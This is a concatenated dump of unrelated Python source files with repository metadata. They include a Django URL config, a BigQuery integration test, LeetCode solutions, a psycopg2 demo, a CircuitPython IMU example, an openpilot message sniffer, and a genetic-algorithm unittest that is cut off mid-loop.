9c6962d424a390c3405c175a8872f70e709b0ce9 | 260f6aafc0ad0ddaba9d672a07ba3f2dd8822031 | /backend/doctor_24708/urls.py | cbd3997267bd3fea03835b10cc434b7fb020de29 | [] | no_license | crowdbotics-apps/doctor-24708 | 9419513611c41e4383a79a97b9e2b96d1f762919 | 74623cb899ba50ad6957cef018d61a000a2e5efb | refs/heads/master | 2023-03-09T08:48:37.840476 | 2021-02-25T04:21:40 | 2021-02-25T04:21:40 | 342,120,747 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,093 | py | """doctor_24708 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
urlpatterns = [
path("", include("home.urls")),
path("accounts/", include("allauth.urls")),
path("modules/", include("modules.urls")),
path("api/v1/", include("home.api.v1.urls")),
path("admin/", admin.site.urls),
path("users/", include("users.urls", namespace="users")),
path("rest-auth/", include("rest_auth.urls")),
# Override email confirm to use allauth's HTML view instead of rest_auth's API view
path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
path("rest-auth/registration/", include("rest_auth.registration.urls")),
path("api/v1/", include("dating.api.v1.urls")),
path("dating/", include("dating.urls")),
path("home/", include("home.urls")),
]
admin.site.site_header = "doctor"
admin.site.site_title = "doctor Admin Portal"
admin.site.index_title = "doctor Admin"
# swagger
api_info = openapi.Info(
title="doctor API",
default_version="v1",
description="API documentation for doctor App",
)
schema_view = get_schema_view(
api_info,
public=True,
permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
7efc136aaf2ae92ccc81f090ee865dba6abf2231 | 45ab4c22d918dc4390572f53c267cf60de0d68fb | /src/Analysis/Engine/Impl/Typeshed/third_party/2and3/Crypto/Util/RFC1751.pyi | 273204b24babd0a8b0f42f0ad4ca7df967b7998e | [
"MIT",
"Apache-2.0"
] | permissive | sourcegraph/python-language-server | 580a24fd15fe9d4abeb95e9333d61db1c11a2670 | 64eae156f14aa14642afcac0e7edaf5d7c6d1a1c | refs/heads/master | 2023-04-09T21:17:07.555979 | 2018-12-06T23:25:05 | 2018-12-06T23:25:05 | 155,174,256 | 2 | 2 | Apache-2.0 | 2018-10-29T08:06:49 | 2018-10-29T08:06:49 | null | UTF-8 | Python | false | false | 168 | pyi | from typing import Any
__revision__ = ... # type: str
binary = ... # type: Any
def key_to_english(key): ...
def english_to_key(s): ...
wordlist = ... # type: Any
| [
"alsher@microsoft.com"
] | alsher@microsoft.com |
810b8e0187dfd900d3aaa49048955829777a39fc | 162e2588156cb2c0039c926c5c442363d9f77b00 | /tests/integration_tests/data_steward/utils/sandbox_test.py | eb5c79832b115f502c30291f17e07c1d6175b607 | [
"MIT"
] | permissive | nishanthpp93/curation | 38be687240b52decc25ffb7b655f25e9faa40e47 | ac9f38b2f4580ae806121dd929293159132c7d2a | refs/heads/develop | 2022-08-08T20:33:53.125216 | 2021-12-03T21:38:48 | 2021-12-03T21:38:48 | 155,608,471 | 1 | 0 | MIT | 2020-10-09T01:14:39 | 2018-10-31T18:54:34 | Python | UTF-8 | Python | false | false | 2,053 | py | # Python imports
import os
import unittest
import app_identity
# Project Imports
from utils import sandbox
from utils.bq import get_client
class SandboxTest(unittest.TestCase):
    """Integration test for sandbox-dataset creation against BigQuery."""
    @classmethod
    def setUpClass(cls):
        print('**************************************************************')
        print(cls.__name__)
        print('**************************************************************')
    def setUp(self):
        # Resolve the project/dataset under test and the derived sandbox id.
        self.project_id = app_identity.get_application_id()
        self.dataset_id = os.environ.get('UNIONED_DATASET_ID')
        self.sandbox_id = sandbox.get_sandbox_dataset_id(self.dataset_id)
        self.fq_sandbox_id = f'{self.project_id}.{self.sandbox_id}'
        # Removing any existing datasets that might interfere with the test
        self.client = get_client(self.project_id)
    def test_create_sandbox_dataset(self):
        # pre-conditions
        pre_test_datasets_obj = list(self.client.list_datasets(self.project_id))
        pre_test_datasets = [d.dataset_id for d in pre_test_datasets_obj]
        # Create sandbox dataset
        sandbox_dataset = sandbox.create_sandbox_dataset(
            self.project_id, self.dataset_id)
        # Post condition checks
        post_test_datasets_obj = list(self.client.list_datasets(
            self.project_id))
        post_test_datasets = [d.dataset_id for d in post_test_datasets_obj]
        # make sure the dataset didn't already exist
        self.assertTrue(sandbox_dataset not in pre_test_datasets)
        # make sure it was actually created
        self.assertTrue(sandbox_dataset in post_test_datasets)
        # Try to create same sandbox, which now already exists
        self.assertRaises(RuntimeError, sandbox.create_sandbox_dataset,
                          self.project_id, self.dataset_id)
    def tearDown(self):
        # Remove fake dataset created in project
        self.client.delete_dataset(self.fq_sandbox_id,
                                   delete_contents=True,
                                   not_found_ok=True)
| [
"noreply@github.com"
] | nishanthpp93.noreply@github.com |
0a02e0e66c2bc59500b508dbfc467fcab4c3580d | 6febd920ced70cbb19695801a163c437e7be44d4 | /leetcode_oj/tree/lowest_common_ancestor.py | 36f0233451b0db28999def6a1c089ac431795fcf | [] | no_license | AngryBird3/gotta_code | b0ab47e846b424107dbd3b03e0c0f3afbd239c60 | b9975fef5fa4843bf95d067bea6d064723484289 | refs/heads/master | 2021-01-20T16:47:35.098125 | 2018-03-24T21:31:01 | 2018-03-24T21:31:01 | 53,180,336 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,814 | py | #!/usr/bin/python
'''
Find the least common ancestor in binary tree
'''
class TreeNode:
# Minimal binary-tree node: `val` payload, `l`/`r` left and right children.
def __init__(self, val, l = None, r = None):
self.val = val
self.l = l
self.r = r
class Solution:
# NOTE(review): this file uses Python 2 print statements throughout.
def findAncestor(self, tree, node1, node2):
# LCA via root-to-node paths: record the path to each value, then the
# last common prefix element is the ancestor. node1/node2 are *values*
# (find_path compares against t.val), unlike lowestCommonAncestor below
# which compares node objects.
if not node1 or not node2:
return None
node1_path = list()
node2_path = list()
if not self.find_path(tree, node1, node1_path) or \
not self.find_path(tree, node2, node2_path):
return None
print node1_path
print node2_path
#Find the first index where path doesn't match
i = 0
while (i < len(node1_path) and i < len(node2_path)):
if node1_path[i] != node2_path[i]:
break
i += 1
return node1_path[i-1]
def find_path(self, t, n, path):
# Append values along the DFS; pop on backtrack so `path` ends up as the
# root-to-n value path when n is found.
if not t:
return False
path.append(t.val)
if n == t.val:
return True
if (t.l and self.find_path(t.l, n, path)) or (t.r and self.find_path(t.r, n, path)):
return True
path.pop()
return False
def lowestCommonAncestor(self, root, p, q):
# Recursive LCA on node objects: if p/q land in different subtrees the
# current root is the answer, otherwise the answer is on the side that
# matched.
if not root:
return None
if root == p or root == q:
return root
matching_left = self.lowestCommonAncestor(root.l, p, q)
matching_right = self.lowestCommonAncestor(root.r, p, q)
print "root : ", root.val, " m_l: ", matching_left.val if matching_left else "None", \
" m_r: ", matching_right.val if matching_right else "None"
#If both match, root is LCA
if matching_left and matching_right:
return root
#Found both the node on one side
return matching_left if matching_left else matching_right
# Build the sample tree
#         3
#       /   \
#      5     1
#     / \   / \
#    6   2 0   8
#       / \
#      7   4
# and print the LCA node of 6 and 4 (expected: node 5).
s = Solution()
t8 = TreeNode(8, None, None)
t0 = TreeNode(0, None, None)
t1 = TreeNode(1, t0, t8)
t4 = TreeNode(4, None, None)
t7 = TreeNode(7, None, None)
t2 = TreeNode(2, t7, t4)
t6 = TreeNode(6, None, None)
t5 = TreeNode(5, t6, t2)
root = TreeNode(3, t5, t1)
print s.lowestCommonAncestor(root, t6, t4)
| [
"dhaaraa.darji@gmail.com"
] | dhaaraa.darji@gmail.com |
ae10124f9637a093727bec5c3a8a47e836fbb458 | ad01faab6dd663dc5193eb8383fdc2d24c2df23d | /_psycopg2/main.py | 0da670d63333ca337b3b928c0fb107341902ee35 | [] | no_license | jurgeon018/snippets | 585db91b8120076b37deaa37393b34f7c61fec66 | e0ab24a99791c3b25422a3208f02919cf98ca084 | refs/heads/master | 2023-05-14T12:31:48.139452 | 2023-01-23T03:33:41 | 2023-01-23T03:33:41 | 222,001,233 | 0 | 0 | null | 2023-05-01T22:16:48 | 2019-11-15T20:51:27 | Python | UTF-8 | Python | false | false | 1,949 | py | import psycopg2
import psycopg2.extras
import psycopg2.errors
# Connect to a local test database (credentials are for the local dev setup
# described in the shell-command string at the bottom of this file).
conn = psycopg2.connect(
database='psycopg2_test_db',
user='jurgeon',
password='69018',
host='127.0.0.1',
port=5432,
)
# DictCursor lets rows be read both by index and by column name.
cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
# cur.execute('''
# create table users (id serial primary key, login varchar(64), password varchar(64))
# ''')
# Parameterised statements: values are passed separately (%s / %(name)s),
# never interpolated into the SQL text.
cur.execute("INSERT INTO users (login, password) VALUES (%s, %s)",
("afiskon", "123"))
cur.execute("INSERT INTO users (login, password) VALUES (%s, %s)",
("eax", "456"))
cur.execute(
"UPDATE users SET password = %(password)s WHERE login = %(login)s",
{"login":"eax", "password":"789"}
)
cur.execute("DELETE FROM users WHERE id = %s", (2,))
# Server-side prepared statement, then executed twice with different values.
cur.execute("PREPARE insuser AS " +
"INSERT INTO users (login, password) VALUES ($1, $2)")
cur.execute("EXECUTE insuser(%s, %s)", ("afiskon", "123"))
cur.execute("EXECUTE insuser(%s, %s)", ("eax", "456"))
conn.commit()
cur.execute("SELECT version()")
cur.execute('SELECT * FROM users LIMIT 10')
print(cur.fetchone())
records = cur.fetchall()
# for record in records:
# # print(dict(record.items()))
# print(record['login'])
# Context-manager demo: the connection block commits/rolls back the
# transaction, the cursor block closes the cursor on exit.
with conn:
with conn.cursor() as cur:
cur.close()
conn.close()
'''
# створює юзера в БД. Вводити 1 раз перед початком розробки.
sudo -u postgres psql -c "create user jurgeon with password '69018'; alter role jurgeon set client_encoding to 'utf8'; alter role jurgeon set default_transaction_isolation to 'read committed'; alter role jurgeon set timezone to 'UTC';"
# це не чіпай
#####sudo -u postgres psql -c 'create database psycopg2_test_db;'
#####sudo -u postgres psql -c 'grant all privileges on database psycopg2_test_db to jurgeon;'
# видаляє БД
sudo -u postgres psql -c "drop database eleek; "
# створює БД
sudo -u postgres psql -c "create database eleek owner jurgeon; "
'''
"jurgeon018@gmail.com"
] | jurgeon018@gmail.com |
daa62f58f170435922812b7e0cd13136bcac3329 | b1cf54e4d6f969d9084160fccd20fabc12c361c2 | /leetcode/first_bad_version.py | a240686a6a5620942a6e98d87cbde784e6963a9c | [] | no_license | zarkle/code_challenges | 88a53477d6f9ee9dd71577678739e745b9e8a694 | 85b7111263d4125b362184df08e8a2265cf228d5 | refs/heads/master | 2021-06-10T11:05:03.048703 | 2020-01-23T06:16:41 | 2020-01-23T06:16:41 | 136,668,643 | 0 | 1 | null | 2019-02-07T23:35:59 | 2018-06-08T21:44:26 | JavaScript | UTF-8 | Python | false | false | 1,159 | py | # https://leetcode.com/problems/first-bad-version/
# https://leetcode.com/articles/first-bad-version/
# The isBadVersion API is already defined for you.
# @param version, an integer
# @return a bool
# def isBadVersion(version):
class Solution:
    def firstBadVersion(self, n):
        """
        :type n: int
        :rtype: int

        Binary-search for the smallest version for which isBadVersion()
        reports True. Invariant: every version below `lo` is good, every
        version above `hi` is bad.
        """
        lo, hi = 0, n
        while lo <= hi:
            mid = (lo + hi) // 2
            if isBadVersion(mid):
                hi = mid - 1
            else:
                lo = mid + 1
        # The window collapsed: `lo` is the first bad version.
        return lo
# 32 ms, 99.8%
# The isBadVersion API is already defined for you.
# @param version, an integer
# @return a bool
# def isBadVersion(version):
class Solution:
def firstBadVersion(self, n):
"""
:type n: int
:rtype: int
"""
# Binary search; returns as soon as `mid` is bad but `mid - 1` is good.
first = 0
last = n
while first <= last:
mid = (first + last) // 2
if isBadVersion(mid) == True:
# NOTE(review): when mid == 0 this probes isBadVersion(-1);
# presumably the API returns False for versions < 1 — verify.
if isBadVersion(mid - 1) == False:
return mid
last = mid - 1
else:
first = mid + 1
"beverly.pham@gmail.com"
] | beverly.pham@gmail.com |
60e99e3c34a04fa47c76b65eeb7e6b16e810f619 | 9ed385053e7f28bfd0c6f186fc4963faac43eb96 | /store/admin.py | 242da77e1948b6798d3a5b94197f9a83ae85741d | [] | no_license | Pagante/greatkart-django | ffadfb5d4827220f3df588fb1d21dc28f1359ce0 | d4bb679c7fd270435f4ce0cc8854bdb3d2e134dd | refs/heads/main | 2023-05-12T01:07:53.092949 | 2021-05-30T16:34:07 | 2021-05-30T16:34:07 | 365,899,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 855 | py | from django.contrib import admin
from django.db import models
from .models import Product, Variation, reviewRating
# Register your models here.
class ProductAdmin(admin.ModelAdmin):
# Product list page: shown columns, slug auto-filled from the product name,
# and which columns link to the change form.
list_display = ('id', 'product_name','price', 'stock', 'category','modified_date', 'is_available')
prepopulated_fields = {'slug': ('product_name',)}
list_display_links = ('id', 'product_name', 'price', 'stock')
class VariationAdmin(admin.ModelAdmin):
# Variation list page: is_active is editable inline in the changelist.
list_display = ('id','product', 'variation_category', 'variation_value' ,'is_active')
list_display_links = ('id','product', 'variation_category', 'variation_value' )
list_editable = ('is_active',)
list_filter = ('product', 'variation_category', 'variation_value' )
# Register the models so they appear in the Django admin site.
admin.site.register(Product, ProductAdmin)
admin.site.register(Variation, VariationAdmin)
admin.site.register(reviewRating)
"55301195+Pagante@users.noreply.github.com"
] | 55301195+Pagante@users.noreply.github.com |
4095bae2f056ec0ad61e9b477a8afdbf75a69e26 | b9e5aebb49734ad47825130529bd64e59f690ecf | /chapter_3/greeting.py | 78fd31f144aa4c16e330ae31c4398f6ae86f6131 | [] | no_license | mikegirenko/python-learning | dab0f67d990d95035f93720986c84aaf422f7a9f | db9e3f0e3897caf703169d1f14b15a9aa1901161 | refs/heads/master | 2021-07-09T08:03:40.535653 | 2020-08-05T00:13:41 | 2020-08-05T00:13:41 | 169,983,732 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | my_friends = ['bob', 'dave', 'tom']
print('Hello, my first friend ' + my_friends[0].title())
print('Hello, my second friend ' + my_friends[1].title())
print('Hello, my last friend ' + my_friends[-1].title())
| [
"mike.girenko@cybergrx.com"
] | mike.girenko@cybergrx.com |
2670eb26885abb954a926b8bbdf67cab549a0831 | 9da8754002fa402ad8e6f25659978bd269bbcec8 | /src/74A/cdf_74A.py | e07ce0c876f071bb2b46f0dfd4a3368160518a56 | [
"MIT"
] | permissive | kopok2/CodeforcesSolutionsPython | a00f706dbf368ba0846c8ae86d4145b5dd3e1613 | 35bec0dbcff47765b123b5fe60476014376153df | refs/heads/master | 2023-02-02T03:08:22.097651 | 2020-12-17T22:00:50 | 2020-12-17T22:00:50 | 196,035,812 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | from operator import itemgetter
class CodeforcesTask74ASolution:
def __init__(self):
self.result = ''
self.n = 0
self.participants = []
def read_input(self):
self.n = int(input())
for x in range(self.n):
self.participants.append(input().split(" "))
def process_task(self):
scores = []
for part in self.participants:
score = 0
score += int(part[1]) * 100
score -= int(part[2]) * 50
score += sum([int(x) for x in part[2:]])
scores.append((part[0], score))
scores.sort(reverse=True, key=itemgetter(1))
self.result = scores[0][0]
def get_result(self):
return self.result
if __name__ == "__main__":
Solution = CodeforcesTask74ASolution()
Solution.read_input()
Solution.process_task()
print(Solution.get_result())
| [
"oleszek.karol@gmail.com"
] | oleszek.karol@gmail.com |
aed45e56c7dc367acf8f001535bbe48a7d4e1b21 | 6841f44b102572978b67af7b9fba9db03f75a6c3 | /cravattdb/contrib/residue_number_annotation/__init__.py | d74359f210fd5f30cb7a1134f916ebcb18581c7f | [] | no_license | radusuciu/cravattdb | 69fae8c30a94774420024ad4b90c285bc9c2c64c | bc4b2a147a374eed2e9350e824df85ba2108fca9 | refs/heads/master | 2021-06-06T08:29:41.824284 | 2016-10-21T21:57:13 | 2016-10-21T21:57:13 | 65,228,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,980 | py | """Blergh."""
from cravattdb.contrib.residue_number_annotation import uniprot
from urllib.parse import urlparse
from functools import partial
import ftplib
import pathlib
import gzip
SWISSPROT_URL = urlparse(
'ftp://ftp.uniprot.org/pub/databases/uniprot/current_release/knowledgebase/taxonomic_divisions/uniprot_sprot_human.dat.gz'
)
ABS_PATH = pathlib.Path(__file__).parents[0]
SWISSPROT_DAT = pathlib.Path(ABS_PATH, 'data/uniprot_sprot_human.dat')
DATA_PATH = pathlib.Path(ABS_PATH, 'data/uniprot.json')
def get_residue_number(experiment_type):
    """Return a callable that maps (uniprot_id, peptide) to a residue number.

    Only the 'isotop' experiment type supports residue annotation; any other
    type yields None. The returned callable is bound to a freshly opened
    uniprot database handle.
    """
    if experiment_type != 'isotop':
        return None
    return partial(_get_residue_number, db=get_db())
def _get_residue_number(uniprot_id, peptide, db=None):
    """Return residue number for labeled cysteine in a given protein.

    Best-effort lookup: returns None when the lookup fails for any reason.
    Opens a database handle via get_db() when none is supplied.
    """
    residue = None
    if not db:
        db = get_db()
    try:
        residue = uniprot.get_residue_number(db, uniprot_id, peptide)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # propagate; any lookup failure still falls back to None.
        pass
    return residue
def get_db():
"""Get a handle to uniprot db, downloading if necessary."""
# Only fetch the raw SwissProt .dat when neither the parsed data file nor
# the raw input exists locally; uniprot.init parses/loads from these paths.
if not DATA_PATH.exists() and not SWISSPROT_DAT.exists():
download_database()
db = uniprot.init(
data_path=str(DATA_PATH),
input_data_path=str(SWISSPROT_DAT)
)
# Currently a no-op (see cleanup_database_files below).
cleanup_database_files()
return db
def download_database():
    """Download the gzipped human SwissProt .dat from the UniProt FTP site
    and decompress it to SWISSPROT_DAT.
    """
    db_path = pathlib.Path(SWISSPROT_URL.path)
    archive_path = pathlib.Path('data', db_path.name)

    with ftplib.FTP(SWISSPROT_URL.netloc) as ftp:
        ftp.login()
        ftp.cwd(str(db_path.parent))
        retr_command = 'RETR {}'.format(db_path.name)
        # Fix: close the local archive file once the transfer completes —
        # the previous version leaked the handle returned by open().
        with open(str(archive_path), 'wb') as archive:
            ftp.retrbinary(retr_command, archive.write)

    # Decompress the downloaded archive into the .dat file.
    with gzip.open(str(archive_path), 'r') as z:
        with open(str(SWISSPROT_DAT), 'wb') as f:
            f.writelines(z)
def cleanup_database_files():
"""If there are any giant downloaded files, delete them."""
# NOTE(review): stub — nothing is deleted yet; the downloaded archive and
# .dat file remain on disk after get_db() runs.
pass
| [
"radusuciu@gmail.com"
] | radusuciu@gmail.com |
7dedc777e0e8c11ea0c28aa6c6a08bd4e0d6cf3f | 2bcc421ee345b00cf805c543b37d18b5d019dc04 | /adafruit-circuitpython-bundle-6.x-mpy-20201126/examples/bno08x_simpletest.py | 7be292ef80153375b4ff5a7b2baf3d3e200f97f0 | [] | no_license | saewoonam/sc-current-source-titano | 5a1ad46889c1b09c168424901fd71cb4eab5c61b | 1c136aa8b61268d9ac0b5a682b30ece70ab87663 | refs/heads/main | 2023-03-02T22:12:26.685537 | 2021-02-09T03:28:01 | 2021-02-09T03:28:01 | 317,299,900 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,477 | py | # SPDX-FileCopyrightText: 2020 Bryan Siepert, written for Adafruit Industries
#
# SPDX-License-Identifier: Unlicense
import time
import board
import busio
from adafruit_bno08x import (
BNO_REPORT_ACCELEROMETER,
BNO_REPORT_GYROSCOPE,
BNO_REPORT_MAGNETOMETER,
BNO_REPORT_ROTATION_VECTOR,
)
from adafruit_bno08x.i2c import BNO08X_I2C
# Open the I2C bus and attach the BNO08x IMU, then enable the four sensor
# reports that are printed below.
i2c = busio.I2C(board.SCL, board.SDA, frequency=800000)
bno = BNO08X_I2C(i2c)
bno.enable_feature(BNO_REPORT_ACCELEROMETER)
bno.enable_feature(BNO_REPORT_GYROSCOPE)
bno.enable_feature(BNO_REPORT_MAGNETOMETER)
bno.enable_feature(BNO_REPORT_ROTATION_VECTOR)
# Poll and print all four readings twice a second, forever.
while True:
time.sleep(0.5)
print("Acceleration:")
accel_x, accel_y, accel_z = bno.acceleration # pylint:disable=no-member
print("X: %0.6f Y: %0.6f Z: %0.6f m/s^2" % (accel_x, accel_y, accel_z))
print("")
print("Gyro:")
gyro_x, gyro_y, gyro_z = bno.gyro # pylint:disable=no-member
print("X: %0.6f Y: %0.6f Z: %0.6f rads/s" % (gyro_x, gyro_y, gyro_z))
print("")
print("Magnetometer:")
mag_x, mag_y, mag_z = bno.magnetic # pylint:disable=no-member
print("X: %0.6f Y: %0.6f Z: %0.6f uT" % (mag_x, mag_y, mag_z))
print("")
print("Rotation Vector Quaternion:")
quat_i, quat_j, quat_k, quat_real = bno.quaternion # pylint:disable=no-member
print(
"I: %0.6f J: %0.6f K: %0.6f Real: %0.6f" % (quat_i, quat_j, quat_k, quat_real)
)
print("")
| [
"nams@nist.gov"
] | nams@nist.gov |
95fcf4a17f0202eed8705013ffc615e1f1de0c74 | 7ef01829aca4b92687780d45745f62ca33480bc1 | /selfdrive/debug/dump.py | 89dd43fa4ce002a291378926b2c0b45a34ec58a6 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | Jamezz/openpilot | 25392231ff229dc3dd360fa6bf782326d962496f | 5272c6b18e56a7124a56d2c2f6d8a7d7b2d4ac10 | refs/heads/volt | 2020-03-08T06:59:47.872585 | 2018-03-27T04:40:15 | 2018-03-27T04:40:15 | 127,984,350 | 0 | 0 | MIT | 2018-05-15T15:02:00 | 2018-04-04T00:25:52 | C | UTF-8 | Python | false | false | 2,576 | py | #!/usr/bin/env python
import sys
import argparse
import zmq
import json
from hexdump import hexdump
from threading import Thread
from cereal import log
import selfdrive.messaging as messaging
from selfdrive.services import service_list
def run_server(socketio):
# Serve the Flask-SocketIO app on all interfaces; `app` is the module-level
# Flask instance created in the --map branch of the main block below.
socketio.run(app, host='0.0.0.0', port=4000)
if __name__ == "__main__":
context = zmq.Context()
poller = zmq.Poller()
parser = argparse.ArgumentParser(description='Sniff a communcation socket')
parser.add_argument('--pipe', action='store_true')
parser.add_argument('--raw', action='store_true')
parser.add_argument('--json', action='store_true')
parser.add_argument('--dump-json', action='store_true')
parser.add_argument('--no-print', action='store_true')
parser.add_argument('--proxy', action='store_true', help='republish on localhost')
parser.add_argument('--map', action='store_true')
parser.add_argument('--addr', default='127.0.0.1')
parser.add_argument("socket", type=str, nargs='*', help="socket name")
args = parser.parse_args()
republish_socks = {}
for m in args.socket if len(args.socket) > 0 else service_list:
if m in service_list:
port = service_list[m].port
elif m.isdigit():
port = int(m)
else:
print("service not found")
exit(-1)
sock = messaging.sub_sock(context, port, poller, addr=args.addr)
if args.proxy:
republish_socks[sock] = messaging.pub_sock(context, port)
if args.map:
from flask.ext.socketio import SocketIO
from flask import Flask
app = Flask(__name__)
socketio = SocketIO(app, async_mode='threading')
server_thread = Thread(target=run_server, args=(socketio,))
server_thread.daemon = True
server_thread.start()
print 'server running'
while 1:
polld = poller.poll(timeout=1000)
for sock, mode in polld:
if mode != zmq.POLLIN:
continue
msg = sock.recv()
evt = log.Event.from_bytes(msg)
if sock in republish_socks:
republish_socks[sock].send(msg)
if args.map and evt.which() == 'liveLocation':
print 'send loc'
socketio.emit('location', {
'lat': evt.liveLocation.lat,
'lon': evt.liveLocation.lon,
'alt': evt.liveLocation.alt,
})
if not args.no_print:
if args.pipe:
sys.stdout.write(msg)
sys.stdout.flush()
elif args.raw:
hexdump(msg)
elif args.json:
print(json.loads(msg))
elif args.dump_json:
print json.dumps(evt.to_dict())
else:
print evt
| [
"user@comma.ai"
] | user@comma.ai |
f2cd0ab77cb5f8fa5558cf6172353ec2230c9127 | f3d38d0e1d50234ce5f17948361a50090ea8cddf | /CodeUp/Python 기초 100제/6036번 ; 단어 여러 번 출력하기.py | bc0bcc44a3400612fd542a6d58530b3105f25276 | [] | no_license | bright-night-sky/algorithm_study | 967c512040c183d56c5cd923912a5e8f1c584546 | 8fd46644129e92137a62db657187b9b707d06985 | refs/heads/main | 2023-08-01T10:27:33.857897 | 2021-10-04T14:36:21 | 2021-10-04T14:36:21 | 323,322,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | # https://codeup.kr/problem.php?id=6036
# CodeUp 6036: print a word repeated a given number of times.
from sys import stdin

# Input line: "<word> <count>" separated by a single space.
word, count = stdin.readline().split(' ')

# Repeat the word `count` times and print the result.
print(word * int(count))
"bright_night_sky@naver.com"
] | bright_night_sky@naver.com |
c6e462a6e0fd6dad1a07c73b7443f6fd2dfd4419 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02987/s591389519.py | 8762798d4042e04b87616ffd6fa0f37468561ff7 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | # -*- coding: utf-8 -*-
s = input()
cnt = {l:0 for l in set(s)}
if len(cnt) != 2:
print('No')
exit(0)
for l in s:
cnt[l] += 1
if cnt[l] > 2:
print('No')
exit(0)
print('Yes')
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
5f7afd4b4b67a971d1a07293744294fe27cd11a4 | 256644d14bd15f8e1a3e92c95b1655fd36681399 | /backup/GA_NN/v4/testGA.py | c6a234d32f017184ac400c1068bb0f05643dd4d1 | [] | no_license | mfbx9da4/neuron-astrocyte-networks | 9d1c0ff45951e45ce1f8297ec62b69ee4159305a | bcf933491bdb70031f8d9c859fc17e0622e5b126 | refs/heads/master | 2021-01-01T10:13:59.099090 | 2018-06-03T12:32:13 | 2018-06-03T12:32:13 | 12,457,305 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,124 | py | import unittest
from GA import createPop, pairPop, NN, rankPop, itemgetter
from GA import evolveNewPop, selectTwoIndividuals
from pylab import where, array
class testcreatePop(unittest.TestCase):
    """Checks on a freshly created GA population."""

    def setUp(self):
        self.pop = createPop()

    def testType(self):
        # Every individual must be a neural network.
        for ind in self.pop:
            self.assertIsInstance(ind, NN)

    def testWeightsAreNotTheSame(self):
        """Every pair of individuals must differ in both weight matrices.

        Compares each unordered pair exactly once (j > i); the previous
        version compared every ordered pair, doing each check twice.
        """
        for i in range(len(self.pop)):
            for j in range(i + 1, len(self.pop)):
                wi1 = array(self.pop[i].wi)
                wi2 = array(self.pop[j].wi)
                for row in where(wi1 == wi2, True, False):
                    # No row of the input weights may be fully identical.
                    self.assertFalse(row.all())
                wo1 = array(self.pop[i].wo)
                wo2 = array(self.pop[j].wo)
                for row in where(wo1 == wo2, True, False):
                    # Same for the output weights.
                    self.assertFalse(row.all())

    def testShapeOfInputWeights(self):
        # Input weight matrices are (input units x hidden units).
        for ind in self.pop:
            self.assertEqual(array(ind.wi).shape,
                             (NN.ni, NN.nh))

    def testShapeOfOutputWeights(self):
        # Output weight matrices are (hidden units x output units).
        for ind in self.pop:
            self.assertEqual(array(ind.wo).shape,
                             (NN.nh, NN.no))
class testpairPop(unittest.TestCase):
"""
paired pop is zip(weights, errors, fitnesses)
accessed in the order:
pairedPop[individual][weights][input/output weights]
"""
def setUp(self):
self.pop = createPop()
self.pairedPop = pairPop(self.pop)
def testShapeOfPairedPop(self):
# One 4-tuple per individual in the population.
self.assertEqual(array(self.pairedPop).shape,
(NN.pop_size, 4))
def testWeightsAreACopy(self):
# The paired weights must be copies, not references to the live
# individuals' matrices (checked by object identity).
for i in range(len(self.pop)):
self.assertNotEqual(id(self.pop[i].wi),
id(self.pairedPop[i][0][0]),
'input weights, ind ' + str(i) )
self.assertNotEqual(id(self.pop[i].wo),
id(self.pairedPop[i][0][1]),
'output weights, ind ' + str(i))
def testShapeOfInputWeights(self):
for ind in self.pairedPop:
self.assertEqual(array(ind[0][0]).shape,
(NN.ni, NN.nh))
def testShapeOfOutputWeights(self):
for ind in self.pairedPop:
self.assertEqual(array(ind[0][1]).shape,
(NN.nh, NN.no))
class testrankPop(unittest.TestCase):
def setUp(self):
# need to test that rankedPop is ordered in descending order
# NOTE(review): placeholder — no assertions implemented yet.
pass
class testevolveNewPop(unittest.TestCase):
"""
rankedPop is zip(weights, errors, fitnesses) ordered in descending
order of fitness
"""
def setUp(self):
self.pop = createPop()
self.pairedPop = pairPop(self.pop)
self.rankedPop = sorted(self.pairedPop, key=itemgetter(-1), reverse=True)
self.rankedWeights = [x[0] for x in self.rankedPop]
self.fitnessScores = [x[-1] for x in self.rankedPop]
self.newpopW = evolveNewPop(self.rankedPop)
def testShapeOfInputWeights(self):
for ind in self.pairedPop:
self.assertEqual(array(ind[0][0]).shape,
(NN.ni, NN.nh))
def testShapeOfOutputWeights(self):
for ind in self.pairedPop:
self.assertEqual(array(ind[0][1]).shape,
(NN.nh, NN.no))
def testNotCopiesOfRankedPop(self):
# Evolved weights must be new objects, not views of the parents'
# weight matrices (identity check at both levels of nesting).
for i in range(len(self.newpopW)):
for j in range(len(self.rankedWeights)):
